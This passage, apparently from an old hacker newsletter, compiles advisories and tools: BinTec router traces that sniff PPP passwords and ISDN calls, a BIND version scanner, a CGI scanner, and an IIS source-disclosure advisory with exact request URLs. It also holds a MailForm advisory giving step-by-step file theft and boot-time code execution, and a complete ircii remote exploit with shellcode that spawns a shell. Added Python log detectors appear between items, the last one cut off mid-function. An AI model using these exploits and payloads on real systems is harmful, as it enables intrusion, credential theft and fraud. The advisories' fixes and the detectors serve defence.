Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds

(5) BrickTracing a password from an outgoing PPP connection
___________________________________________________________________________

bitch:~$ bricktrace -h2pi 1 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 1 Unit 0 Slot 2                  /* Tracing the B-Channel */
[...]
020721.320 X DATA[0025]
0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69  ...#.....user
0010: 73 07 72 65 74 68 6f 6f 6f                       .password
PPP packet protocol 0xc023 (PAP)
ID 1 PAP Authenticate-Request Peer-ID user Password password
A=FF UI
[...]

(6) Snooping an S0 Bus for telephone calls
___________________________________________________________________________

bitch:~$ bricktrace -h3 0 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 0 Unit 0 Slot 2                  /* Tracing the D-Channel */
[...]
021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88     ...............
PD=08 Dest CR=01 SETUP ACKNOWLEDGE
IE-Element : Channel Identification :
  Interface implicitly identified
  Interface type S0
  Channelnumber is exclusive (accept only this)
  Identified Channel is not D-Channel
  Selected Channel : B1-Channel
IE-Element : Progress Indicator reports In-band information now available
[...]
021105.366 R DATA[0008]
0000: 02 b3 12 2e 08 01 81 02                          ........
PD=08 Dest CR=01 CALL PROCEEDING
021108.076 R DATA[0012]
0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88              ............
PD=08 Dest CR=01 ALERT
IE-Element : Progress Indicator reports In-band information now available
[...]
021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c  ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32              .!.130112112
PD=08 Dest CR=01 CONNECT
IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
IE-Element : Unknown IE-Element 0x4c in Codeset 0
[...]
021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4  ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01  7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e           (.0 Einheiten
PD=08 Dest CR=01 RELEASE
IE-Element : Facility
  Service discriminator is supplement. application
  Component tag is invoke
    integer (0x2) 50231
    integer (0x1) 34
    sequence (0xa) {
      GetNextRequest (0x5) {
        sequence (0x3) {
          integer (0x1) 0
        }
      }
      GetResponse (0x1)
    }
IE-Element : Display : 0 Einheiten
[...]

(7) Checking line status from BinTec's httpd:
___________________________________________________________________________

[...]
Hardware Interfaces
Slot 1  Ethernet  o.k.
Slot 2  ISDN S2M  o.k.  used 13, available 17
- - X X X X X - X - - - X - X - - X - - X - - - X - - X - X
[...]

now we know what to sniff:

sniffing an inbound ppp connection on line 4 slot 2:

bitch:~$ bricktrace -h2pit 4 0 2
bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
Tracing: Channel 4 Unit 0 Slot 2
[...]
004419.999 X DATA[0045]
0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44  !E..,9.@.>....aD
0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5  ..aE(.P.y.....+.
0020: 7a 60 12 44 70 3c                                z.Dp<
Compressed PPP packet protocol 0x21 (TCP/IP)
A=21 RNR P/F=0 N(R)=2
IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6
TCP-Message, sourceport 80 destinationport 55929 sequence number 3170412967 acknowledgement number 36423034 offset 6 flags ACK SYN window 17520 checksum 0x3c9e urgent 0
[...]
004420.640 R DATA[0609]
0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f  -p..C.GET http:/
0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e  /chat3.playgroun
0020: 64 2e 64 65 2f 63                                d.de/c
Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
A=2D I P/F=1 N(R)=3 N(S)=0
0E B0 C FF G E T h t t p : / / c h a t 3 . p l a y g r o u n d . d e / c h a t
IP-Packet from a to b protocol 0x2f
[...]

Impact
===================

(1) SNMP communities / login passwords
___________________________________________________________________________

By using standard brute-force methods, the SNMP community string, and therefore the login passwords, can be obtained. A program doing this is for example ADMsnmp, which has to be fed with a wordlist. Bruteforcing this way is quite effective, you get about 500-1000 words per minute (which of course depends on your and the router's connectivity). You can get this program from [4]. Bruteforcing the passwords directly via telnet isn't possible because the router slows down after approx. 6 tries.

(2) Using the CAPI facility
___________________________________________________________________________

Nearly any router can remotely be used as 'ISDN-Line provider' - you can use the BRI lines of the router if they are not password protected. While doing a short survey most machines we encountered were proven to be vulnerable, so they didn't have any restrictions set. The CAPI daemon listens on port 6000 as you can see in the 'Tests' section.
This feature can, for example, be exploited by dialing expensive numbers
(0900 or 0190 [in DE] lines). You may also hide your real identity by calling
a 'call-by-call' ISP who gives you another IP you can deal with.

A (R)CAPI library for Un*x exists, which can be used for these attacks. It is
available via [5]. There is also a CAPI user interface for MS Windows, which
is called Brickware and can be obtained via [6].

Firmware before 5.1.x seems to be generally not passworded, we have not
checked 5.1.x yet.

(3) Using BrickTrace for snooping BRI-Lines
___________________________________________________________________________

You can gain information of the ISP or corporation running these routers with
open BrickTrace ports (Port 7000, default) with a program called bricktrace,
which is available via [7]. In the documentation this port isn't even stated
(!). See 'Solution' for how to turn off this port.

As you can see the whole data passing the line, you also get the users'
passwords and see what they do on the net (it is in a way like a dedicated
sniffer). Using this technique of sniffing you may also see private
information of corporations, not only restricting you to Internet traffic but
also 'intranet' lines that use the same router, as well as telephony networks
(S0 bus).

Explanation
===================

BinTec Communications seems to rely on security by obscurity. Neither the
severity of these services, nor how to configure them, are mentioned properly
in their documentation. However, BinTec routers *can* be secured, it just
seems not to be common knowledge.

In addition to this, it seems to be quite useless to provide RCAPI facilities
on a router which is mainly used for dial-in purposes. If one needs those
abilities, encrypted management access would be appropriate.
Solution
===================

SNMP:       disable               (admin.biboAdmSnmpPort=0)
                                  (admin.biboAdmSnmpTrapPort=0)
RCAPI:      disable or password protect
                                  (admin.biboAdmCapiTcpPort=0)
BrickTrace: disable               (admin.biboAdmTraceTcpPort=0)

Just manage your Router through serial line, because if your connection gets
sniffed, these services can be reactivated.

Acknowledgments
================

The bug-discovery and the demonstration are due to Stephan Holtwisch [2].
This advisory has been written by Stephan 'rookie' Holtwisch and hendy.

Contact Information
===================

The TESO crew can be reached by mailing to teso@coredump.cx.
Our web page is at [1].

References
===================

[1] TESO
    http://teso.scene.at/ or https://teso.scene.at/
[2] Stephan Holtwisch
    sholtwis@muenster.de
[3] BinTec Communications
    http://www.bintec.de
[4] ADMsnmp - bruteforce SNMP communities
    ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
[5] libcapi for RCAPI (Unix)
    ftp://ftp.bintec.de/pub/brick/libcapi/
[6] BrickWare (CAPI software for windows)
    ftp://ftp.bintec.de/pub/brick/brickware/
[7] BrickTrace (BRI-Line snooping)
    ftp://ftp.bintec.de/pub/brick/unixtool/

Disclaimer
===================

This advisory does not claim to be complete or to be usable for any purpose.
Especially information on the vulnerable systems may be inaccurate or wrong.
The supplied information is not to be used for malicious purposes, but for
educational purposes only.

This advisory is free for open distribution in unmodified form. Articles that
are based on information from this advisory should include at least links [1]
and [2].
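Impact (1) above describes guessing SNMP communities with a wordlist at 500-1000 words a minute, and the Solution is to switch SNMP off. Where the agent has to stay reachable, the sensible fallback is to watch for that guessing pattern. The following is an added example, not TESO's or BinTec's code: it runs over constructed SNMP request records (the line format is assumed, as a packet filter or IDS in front of the router might log it) and flags any source that tries more than a handful of distinct community strings within a minute, which a legitimate poller never does.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed record format for this example (assumed, not BinTec's own log
# format): one SNMP request per line, as a packet filter or IDS in front of
# the router might record it: "<ISO timestamp> src=<ip> community=<string> pdu=<type>"
RECORD_RE = re.compile(r"^(\S+)\s+src=(\S+)\s+community=(\S*)\s+pdu=(\S+)$")

# Constructed sample: a monitoring host polls with its one community every ten
# seconds; a guesser (ADMsnmp-style, hundreds of words a minute) cycles a wordlist.
SAMPLE_RECORDS = [
    "2000-04-01T10:00:00 src=10.0.0.10 community=public pdu=GetRequest",
    "2000-04-01T10:00:10 src=10.0.0.10 community=public pdu=GetRequest",
    "2000-04-01T10:00:20 src=10.0.0.10 community=public pdu=GetRequest",
] + [
    "2000-04-01T10:00:05.%06d src=192.0.2.77 community=%s pdu=GetRequest" % (i * 100000, word)
    for i, word in enumerate(["public", "private", "admin", "bintec",
                              "brick", "router", "snmp", "secret"])
]


def parse_record(line):
    """Return (timestamp, src, community, pdu), or None for a line that does not match."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)


def detect_community_guessing(lines, window_seconds=60, max_distinct=5):
    """Flag sources that try more than max_distinct community strings inside a
    sliding window. Returns {src: (window start, distinct count at detection)}.

    Telnet logins on the router are throttled after about six bad tries; SNMP
    is not, so the number of distinct communities per source is the signal.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # src -> deque of (timestamp, community)
    alerts = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        ts, src, community, _pdu = rec
        q = recent[src]
        q.append((ts, community))
        while q and ts - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        distinct = {c for _, c in q}
        if len(distinct) > max_distinct and src not in alerts:
            alerts[src] = (q[0][0], len(distinct))
    return alerts


if __name__ == "__main__":
    for src, (since, n) in detect_community_guessing(SAMPLE_RECORDS).items():
        print("%s tried %d communities since %s" % (src, n, since.isoformat()))
```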
@HWA

248.0 b0f: namedscan.c
~~~~~~~~~~~~~~~~

/*********************************************/
/* namedscan.c will check the named version  */
/* of a host, and tell you if its a vuln version */
/***********************************************/
/*          buffer0verfl0w security          */
/*******************************/
/*    coded by eth0 from b0f   */
/*     [http://www.b0f.com]    */
/*******************************/

/* headers needed by the code below */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <signal.h>
#include <time.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <arpa/nameser_compat.h>
#include <resolv.h>
#include <netdb.h>

int lookup_host(struct sockaddr_in *ra, char *hn, unsigned short rp);
void probe_bind(struct sockaddr_in ra);
int talk(int sd, char *pkt, int pktl, char opc);
int make_keypkt(char *pktbuf, char opc);
void print_ver(char *host, int vul, char *buf);
void handle_alarm(int signum);

/* resolve hn (dotted quad or hostname) into ra, with port rp */
int lookup_host(struct sockaddr_in *ra, char *hn, unsigned short rp)
{
    struct hostent *he;

    ra->sin_family = AF_INET;
    ra->sin_port = htons(rp);
    if ((ra->sin_addr.s_addr = inet_addr(hn)) != INADDR_NONE)
        return 1;
    if ((he = gethostbyname(hn)) != (struct hostent *)NULL) {
        memcpy(&ra->sin_addr.s_addr, he->h_addr, 4);
        return 1;
    }
    herror("Unable to resolve hostname");
    return 0;
}

/* send an inverse query (to see if the server supports it) and a
   version.bind TXT query, then hand the answer to print_ver() */
void probe_bind(struct sockaddr_in ra)
{
    int sd;
    char iquery[512], vquery[512], rname[256];
    struct hostent *he;
    HEADER *dh = (HEADER *)iquery;

    memset(vquery, 0, sizeof(vquery));
    memset(iquery, 0, sizeof(iquery));
    if (((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) ||
        (connect(sd, (struct sockaddr *)&ra, sizeof(ra)) == -1)) {
        perror("Unable to connect");
        if (sd != -1)
            close(sd);
        return;
    }
    if ((he = gethostbyaddr((char *)&ra.sin_addr, sizeof(ra.sin_addr), AF_INET))
            == (struct hostent *)NULL) {
        sprintf(rname, "%s", inet_ntoa(ra.sin_addr));
    } else {
        strncpy(rname, he->h_name, sizeof(rname));
        rname[sizeof(rname) - 1] = '\0';
    }
    if (!talk(sd, iquery, sizeof(iquery), IQUERY))
        return;
    if (!talk(sd, vquery, sizeof(vquery), QUERY))
        return;
    close(sd);
    /* if dh->rcode == 0, then our iquery request was answered and the
       remote server supports iquery */
    print_ver(rname, dh->rcode == 0, vquery);
}

/*
 * write our packet from pkt, wait for a response and put it in pkt.
 * if the alarm goes off or the read fails, we print error
 * and return 0. otherwise, our response packet is in pkt and we return 1.
 */
int talk(int sd, char *pkt, int pktl, char opc)
{
    int pktlen;

    pktlen = make_keypkt(pkt, opc);
    /* write() returns -1 on error, so compare against the length we sent */
    if (write(sd, pkt, pktlen) != pktlen) {
        perror("write failed");
        close(sd);
        return 0;
    }
    /* #ifdef DEBUG printf("write() success\n"); #endif */
    siginterrupt(SIGALRM, 1);
    signal(SIGALRM, handle_alarm);
    alarm(3);
    pktlen = read(sd, pkt, pktl);
    if (pktlen <= 0) {
        if (errno == EINTR)
            errno = ETIMEDOUT;
        perror("<[Namedscan]>:([ Read Failed *shrugs* ]) -> read failed");
        close(sd);
        return 0;
    }
    /* #ifdef DEBUG printf("read success\n"); #endif */
    alarm(0);
    return 1;
}

/* build either an inverse query or a version.bind CHAOS TXT query in pktbuf */
int make_keypkt(char *pktbuf, char opc)
{
    HEADER *dnsh;
    char *ptr = pktbuf;
    int pktlen = 0;

    dnsh = (HEADER *)ptr;
    /* fill out the parts of the DNS header that aren't 0 */
    dnsh->id = htons(rand() % 65535);
    dnsh->opcode = opc;
    dnsh->rd = 1;
    dnsh->ra = 1;
    /* one answer for IQUERY, one question for QUERY */
    if (opc == IQUERY)
        dnsh->ancount = htons(1);
    else if (opc == QUERY)
        dnsh->qdcount = htons(1);
    pktlen += sizeof(HEADER);
    ptr += sizeof(HEADER);

    /* we have to make a QUERY, fill out the question section */
    if (opc == QUERY) {
        /* version.bind. == elite */
        char qstr[] = "\007version\004bind\000";
        int qlen = strlen(qstr) + 1;

        memcpy(ptr, qstr, qlen);
        ptr += qlen;
        pktlen += qlen;
        PUTSHORT(T_TXT, ptr);
        PUTSHORT(C_CHAOS, ptr);
        pktlen += sizeof(short) * 2;
    }
    /* add a resource record for the inverse query */
    else if (opc == IQUERY) {
        unsigned long addr = inet_addr("1.2.3.4");
        unsigned long ttl = 31337;
        unsigned short addrlen = 4;

        *(ptr++) = '\0';
        pktlen++;
        PUTSHORT(T_A, ptr);
        PUTSHORT(C_IN, ptr);
        PUTLONG(ttl, ptr);
        PUTSHORT(addrlen, ptr);
        PUTLONG(addr, ptr);
        /* PUTLONG writes 32 bits regardless of sizeof(long) */
        pktlen += (sizeof(short) * 3) + (4 * 2);
    }
    /* if we're debugging, show what we just made */
    /* #ifdef DEBUG print_dnspkt(pktbuf, pktbuf + pktlen); #endif */
    return pktlen;
}

/* compare the version string against the list of versions this tool flags */
int checknamed(char *verstr)
{
    if (strstr(verstr, "4.9.5") || strstr(verstr, "4.9.6-REL") ||
        strstr(verstr, "4.9.5-REL") || strstr(verstr, "4.9.5-P1") ||
        strstr(verstr, "8.1-REL") || strstr(verstr, "8.1.1") ||
        strstr(verstr, "8.2") || strstr(verstr, "8.2.1")) {
        /* the 8.2.2-P2..P5 strings also contain "8.2", so they are
           excluded here before anything is reported */
        if (strstr(verstr, "8.2.2-P5") || strstr(verstr, "8.2.2-P4") ||
            strstr(verstr, "8.2.2-P3") || strstr(verstr, "8.2.2-P2")) {
            printf("<[Named Version [%s] ]>\n", verstr);
            return 0;
        }
        printf("<[Named version [%s]]> Possible Vuln\n", verstr);
    } else {
        printf("<[No named vulns found. version [%s]]>\n", verstr);
    }
    return 0;
}

/* advance past a domain name, whether it is written out as labels or
   as a two-byte compression pointer (BIND compresses the answer name) */
static char *skip_name(char *p)
{
    while (*p != '\0') {
        if ((*p & 0xc0) == 0xc0)
            return p + 2;
        p += (unsigned char)*p + 1;
    }
    return p + 1;
}

void print_ver(char *host, int vul, char *buf)
{
    HEADER *dnsh = (HEADER *)buf;
    char *ptr, *verstr;
    int len;

    if (dnsh->rcode != 0) {
        /* printf("%s's named that %s iquery does not respond to version.bind.\n",
                  host, vul ? "supports" : "errors on"); */
        return;
    }
    /* So we actually have a response. Lets skip the crap, starting with the header */
    ptr = (buf + sizeof(HEADER));
    /* then the question section domain name and the type/class of the question */
    ptr = skip_name(ptr);
    ptr += sizeof(short) * 2;
    /* now we skip the answer section domain name (should be the same as the
       question), then type, class, and the 32-bit time to live */
    ptr = skip_name(ptr);
    ptr += (sizeof(short) * 2) + 4;
    /* Here we are at the resource record data length, extract it */
    GETSHORT(len, ptr);
    if (len < 1)
        return;
    /* avoid the need to decompress the string (treat it as one) */
    ptr++;
    /* allocate space for and copy the version response txt */
    verstr = (char *)malloc(len);
    memset(verstr, 0, len);
    memcpy(verstr, ptr, len - 1);
    /* run through the version string and replace non-printable and
       non-whitespace characters with a '.' */
    for (ptr = verstr; ptr - verstr != len - 1; ptr++)
        if (!isprint(*ptr) && !isspace(*ptr))
            *ptr = '.';
    /* print the version and iquery support status, woo hoo */
#ifdef debugz
    printf("%s's named that %s iquery is version: %s\n",
           host, vul ? "supports" : "errors on", verstr);
#endif
    checknamed(verstr);
    free(verstr);
}

/*
 * handle the alarm signal by resetting the alarm timer and
 * the signal handler for SIGALRM. This stuff probably isn't needed,
 * but I did it anyway. It's good for debugging, ran into some problems with
 * alarm() not doing its job.
 */
void handle_alarm(int signum)
{
    alarm(0);
    signal(SIGALRM, SIG_DFL);
    /* #ifdef DEBUG printf("received alarm\n"); #endif */
}

int main(int argc, char *argv[])
{
    struct hostent *he;
    struct sockaddr_in ra;

    if (argv[1] == NULL) {
        printf("coded by eth0 [b0f]\n");
        printf("Usage: %s [host]\n", argv[0]);
        exit(1);
    }
    if ((he = gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }
    if (!lookup_host(&ra, argv[1], NAMESERVER_PORT))
        return 1;
    srand(time(NULL));
    probe_bind(ra);
    return 0;
}

@HWA

249.0 PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sourced from Packetstorm http://packetstorm.securify.com/

Advisory: MailForm v1.91 for Windows 95 and NT 4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================

Do not save this with any editor, or _vital_ formatting may be lost.
Disclaimer:
=============
This document is intended as an advisory, and I cannot be held accountable
for its misuse. The reader assumes all responsibility for his/her use of this
information.

Summary:
==========
Date released: 07/04/2000 (dd/mm/yyyy).
Risk: denial of service, reading of private files, appending to private
files, full system compromise if the aforementioned risks are leveraged
properly.
Vulnerability found by: Chopsui-cide
Vulnerable: MailForm v1.91, probably prior versions (not tested).
Immune: ?

MailForm allows potentially dangerous parameters to be specified by anyone
who can execute it. These allow for reading and writing of files on the
system on which MailForm resides.

Details:
==========
Problem fields:

_1_TextLog -
_1_HTMLLog - these two are the ones used to write to files.
_1_MailTemplate - this is what is used to retrieve files.
_1_INIFile - possibly dangerous, but not discussed here.
_1_MailServer - we can just change this to our own address.
_1_MailTo - we don't even need to bother with this.

It's fairly obvious where the problem lies here. We can specify any file to
send + the POP server to send it to. The con\con bug may also be used to
bring down the entire system. Template files will be cut off at the first
null character, so retrieving of binaries is not practical. Trying to
retrieve certain files will cause MailForm to crash. A very crude example of
how to run code on the remote system is provided in the last section of this
advisory.

Implementation: web interface
===============================
I have constructed some html that allows an attacker to download and append
to files on any remote system running MailForm (cut where it says [snip],
obviously):

[snip]
Web interface for MailForm vulnerabilities.
Do not be alarmed by any "Form submission failed" errors. These are normal.
You will need to modify the form tags in this page to correspond to the host
being attacked.

Download file:

Append to file:
Note: your text will be preceded by garbage.

The Mad Midget Mafia
[snip]

The e-mail will be sent to the host you specify on port 25. It should be easy
enough to capture using netcat.

Implementation: full compromise
=================================
When appending text to files, the following kind of ugly crap precedes it:

[snip]
Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1
Name:
[snip]

Even with this handicap, we can still modify/create batch files. This is how
we will execute code. The idea here is to create a kind of "script" for debug
that will assemble and execute a small program. It is basically just a list
of keystrokes. We then add an entry to autoexec.bat that executes it.

First we need to upload the following file to c:\windows\script.txt

[snip]
a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"
g=100
q
[snip]

Make sure at the end of each line there is _no_ carriage return. Each line
should be terminated by \x0a (linefeed). Get rid of the carriage returns
(\x0d), ie:

a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"
g=100
q

Add a newline (\x0d,\x0a) before the above, and submit the two lines using
the web-based interface.

Add the following line to any batch file that is executed upon start-up (ie,
autoexec.bat):

debug < c:\windows\script.txt

Check that everything is in order by trying to download both script.txt and
the batch file you modified. Force a reboot using the con\con vulnerability.
Once it restarts, the code will be executed.

I know this is a really ugly hack, but it works (poor excuse). Also, make
sure the garbage doesn't interfere with anything (always put a newline before
the start of your commands).

=======================================================================

@HWA

250.0 PSS: CGI rmp_query scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~

/* rmp_query : /cgi-bin/rmp_query server scanning program.
   Scanner by Alhambra (slightly modified)

   A vulnerability exists in the default installation of Caldera OpenLinux 2.3.
   A CGI is installed in /home/httpd/cgi-bin/ named rpm_query. Any user can
   run this CGI and obtain a listing of the packages, and versions of
   packages, installed on this system. This could be used to determine
   vulnerabilities on the machine remotely.

   Usage: rmp_query
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int FLAG = 1;

/* SIGALRM handler: marks the connect() attempt as timed out */
void Call(int signo)
{
    FLAG = 0;
}

int main(int argc, char *argv[])
{
    char host[100], hosta[1024], FileBuf[8097];
    int outsocket, X;
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr outgoing;
    char rmpMessage[] = "GET /cgi-bin/rmp_query\n";

    /* one hostname per line on stdin */
    while (fgets(hosta, 100, stdin)) {
        if (hosta[0] == '\0')
            break;
        hosta[strlen(hosta) - 1] = '\0';
        write(1, hosta, strlen(hosta) * sizeof(char));
        write(1, "\n", sizeof(char));
        nametocheck = gethostbyname(hosta);
        if (nametocheck == NULL) {
            herror(hosta);
            continue;
        }
        outsocket = socket(AF_INET, SOCK_STREAM, 0);
        memset(&serv_addr, 0, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        memcpy(&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgoing.s_addr));
        strcpy(host, inet_ntoa(outgoing));
        serv_addr.sin_addr.s_addr = inet_addr(host);
        serv_addr.sin_port = htons(80);
        /* give the connect() ten seconds before moving on */
        signal(SIGALRM, Call);
        FLAG = 1;
        alarm(10);
        X = connect(outsocket, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
        alarm(0);
        if (FLAG == 1 && X == 0) {
            write(outsocket, rmpMessage, strlen(rmpMessage) * sizeof(char));
            while ((X = read(outsocket, FileBuf, 8096)) > 0)
                write(1, FileBuf, X);
        }
        close(outsocket);
    }
    return 0;
}

@HWA

251.0 PSS:New ircii exploit
~~~~~~~~~~~~~~~~~~~~~

/*
   ircii-4.4 exploit by bladi & aLmUDeNa
   buffer overflow in ircii dcc chat's allow to execute arbitrary

   Affected: ircII-4.4
   Patch: Upgrade to ircII-4.4M
          ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz

   Offset: SuSe 6.x :0xbfffe3ff
           RedHat   :0xbfffe888

   Thanks to : #warinhell,#hacker_novatos
   Special thanks go to: Topo[lb]
   Greetings to everyone who knows us, especially eva ;)  (bladi@euskalnet.net)
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname)
{
    struct hostent *hozt;
    struct sockaddr_in tmp;
    struct in_addr in;

    if ((hozt = gethostbyname(hostname)) == NULL) {
        printf(" ERROR: IP incorrecta\n");
        exit(0);
    }
    memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
    memcpy(&in, &tmp.sin_addr.s_addr, 4);
    return (inet_ntoa(in));
}

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    char *hostname;
    char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char *shell =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int outsocket, i;

    printf("      irciismash ver: 1.0\n");
    printf("              by \n");
    printf("      bladi & aLmUDeNa\n\n");
    if (argc < 3) {
        printf("Usage : %s hostname port\n", argv[0]);
        exit(-1);
    }
    hostname = argv[1];
    outsocket = socket(AF_INET, SOCK_STREAM, 0);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr(h_to_ip(hostname));
    if (connect(outsocket, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        printf(" ERROR: El puerto esta cerradito :_(\n");
        exit(0);
    }
    printf("[1]- Noping\n    [");
    for (i = 0; i < 47; i++) {
        if (!(i % 7)) {
            usleep(9);
            printf(".");
            fflush(stdout);
        }
        write(outsocket, nops, strlen(nops));
    }
    printf("]\n");
    printf("    Noped\n");
    printf("[2]- Injectin shellcode\n");
    write(outsocket, shell, strlen(shell));
    usleep(999);
    printf("    Injected\n");
    printf("[3]- Waiting\n    [");
    for (i = 0; i < 299; i++) {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket, "\xff", strlen("\xff"));
        write(outsocket, "\xbf", strlen("\xff"));
        write(outsocket, "\xff", strlen("\xe9"));
        write(outsocket, "\xe3", strlen("\xff"));
    }
    printf("]\n[4]- Xploit \n  - --(DoNe)-- -\n");
    close(outsocket);
    return 0;
}
/* www.hack.co.za */

@HWA

252.0 PSS:Cerberus Information Security Advisory (CISADV000330)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cerberus Information Security Advisory (CISADV000330)
http://www.cerberus-infosec.co.uk/advisories.shtml

Released : 30th March 2000
Name : Index Server (Strike 3!)
Affected Systems : Microsoft Internet Information Server
Issue : Attackers can gain source of ASP and other pages
Author : David Litchfield (mnemonix@globalnet.co.uk)

Description
***********

The Cerberus Security Team has found a third issue with Microsoft's Index
Server that affects any web site running Internet Information Server 4 or 5
with Index Server even if the recent Index Server patch has been installed
and even if no .htw files exist on the file system. These systems are at risk
from having the source of ASP pages or other files such as the global.asa
being revealed. Often these files contain sensitive information such as user
IDs and passwords and database source names that are of use to an attacker
attempting to break into a site/network.

Details
*******

If a request is made to

http://charon/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full

only the HTML a user would normally see is returned. However by appending a
%20 to the end of the CiWebHitsFile parameter:

http://charon/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full

it is possible to get the full source. Part of the problem exists because
'null.htw' is not a real file that maps to any file on the file system,
rather it is a 'virtual file' held in memory so even if there are no real
.htw files on the file system IIS boxes with Index Server will still be at
risk. Any request made to null.htw is dealt with by webhits.dll.

Solution
********

If the functionality provided by webhits is needed install Microsoft's patch.
If the functionality is not needed, however, simply unmap the .htw extension
from webhits.dll using the Internet Service Manager MMC snap-in.

A check for this issue already exists in our security scanner, CIS.
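The Details section gives the exact request shape: a .htw stem (null.htw in particular) with CiWebHitsFile naming an .asp or .asa file, and a trailing %20 on that value turning a rendered page into its source. That shape is easy to look for in IIS logs. The following is an added example, not Cerberus' CIS code: it runs the check over constructed W3C-style log lines (the field order is assumed) and separates the full-source variant from the plain probe.

```python
from urllib.parse import parse_qs

# Constructed IIS log lines for this example, in W3C extended format with the
# field order assumed here: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = [
    "2000-03-30 10:01:02 10.1.1.5 GET /default.asp - 200",
    "2000-03-30 10:01:07 10.1.1.5 GET /null.htw CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full 200",
    "2000-03-30 10:01:09 198.51.100.9 GET /null.htw CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 200",
    "2000-03-30 10:01:15 198.51.100.9 GET /null.htw CiWebHitsFile=/global.asa+&CiRestriction=none&CiHiliteType=Full 200",
    "2000-03-30 10:02:00 10.1.1.7 GET /search.htw CiWebHitsFile=/docs/readme.htm&CiRestriction=none&CiHiliteType=Full 200",
]

# Files whose source the advisory says is at risk: ASP pages and global.asa.
SOURCE_EXTENSIONS = (".asp", ".asa")


def parse_line(line):
    """Split one W3C log line into a dict, or return None if it is not seven fields."""
    fields = line.split()
    if len(fields) != 7:
        return None
    date, time, ip, method, stem, query, status = fields
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": "" if query == "-" else query, "status": status}


def classify(entry):
    """Return "alert", "review" or None for one parsed request.

    alert  : .htw request whose CiWebHitsFile value carries trailing whitespace
             after decoding (the %20 / '+' variant that returns the full source)
    review : .htw request pointing CiWebHitsFile at an .asp/.asa file without the
             trailing space; webhits returns only rendered HTML for it, but it is
             the same probe one step earlier
    """
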